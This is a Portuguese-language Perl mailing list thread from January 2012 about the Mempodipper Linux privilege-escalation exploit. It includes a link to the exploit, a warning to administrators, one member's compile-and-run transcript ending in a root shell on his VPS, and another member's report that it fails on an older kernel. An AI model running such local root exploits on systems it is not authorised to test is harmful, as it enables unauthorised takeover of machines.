Em Linux alexeiz 2.6.38-13-generic-pae #53-Ubuntu SMP Mon Nov 28 19:41:58 UTC 2011 i686 i686 i386 GNU/Linux
nem compila. Eu uso muito VMWare, e o suporte aos VMTools e aos módulos que compilam no kernel do Linux para o kernel 3.0 está quebrado (tem uns patches por aí, mas eu não vou compilar kernel agora), então estou usando o 2.6.38 por enquanto. []s, Russian 2012/1/27 Daniel Mantovani <[email protected]> > Acabei de testar na minha vps, > > > mantovani@mantovanilabs:~$ gcc mempodipper.c > mantovani@mantovanilabs:~$ ls > a.out apps mempodipper.c Perl perl5 > mantovani@mantovanilabs:~$ chmod +x a.out > mantovani@mantovanilabs:~$ ./a.out > =============================== > = Mempodipper = > = by zx2c4 = > = Jan 21, 2012 = > =============================== > > [+] Ptracing su to find next instruction without reading binary. > [+] Creating ptrace pipe. > [+] Forking ptrace child. > [+] Waiting for ptraced child to give output on syscalls. > [+] Ptrace_traceme'ing process. > [+] Error message written. Single stepping to find address. > [+] Resolved call address to 0x4020b8. > [+] Opening socketpair. > [+] Waiting for transferred fd in parent. > [+] Executing child from child fork. > [+] Opening parent mem /proc/16574/mem in child. > [+] Sending fd 6 to parent. > [+] Received fd at 6. > [+] Assigning fd 6 to stderr. > [+] Calculating su padding. > [+] Seeking to offset 0x4020ac. > [+] Executing su with shellcode. > # uname -a > Linux mantovanilabs.com 3.0.4-x86_64-linode21 #1 SMP Thu Sep 1 21:28:01 > EDT 2011 x86_64 GNU/Linux > > -- > Software Engineer > Just Another Perl Hacker > Daniel Mantovani +5511 8538-9897 > XOXO > > On Jan 27, 2012, at 12:02 PM, Daniel Mantovani wrote: > > > http://www.techworld.com.au/article/413300/linux_vendors_rush_patch_privilege_escalation_flaw_after_root_exploits_emerge > o exploit, http://www.exploit-db.com/exploits/18411/ > > Atencao administradores, o assunto 'e serio. > > > -- > Software Engineer > Just Another Perl Hacker > Daniel Mantovani +5511 8538-9897 > XOXO > > > > =begin disclaimer > Sao Paulo Perl Mongers: http://sao-paulo.pm.org/ > SaoPaulo-pm mailing list: [email protected] > L<http://mail.pm.org/mailman/listinfo/saopaulo-pm> > =end disclaimer > > -- Alexei "RUSSOZ" Znamensky | russoz EM gmail com | http://russoz.org GPG fingerprint = 42AB E78C B83A AE31 7D27 1CF3 C66F B5C7 71CA 9F3C http://www.flickr.com/photos/alexeiz | http://github.com/russoz "I don't know... fly casual!" -- Han Solo
=begin disclaimer Sao Paulo Perl Mongers: http://sao-paulo.pm.org/ SaoPaulo-pm mailing list: [email protected] L<http://mail.pm.org/mailman/listinfo/saopaulo-pm> =end disclaimer
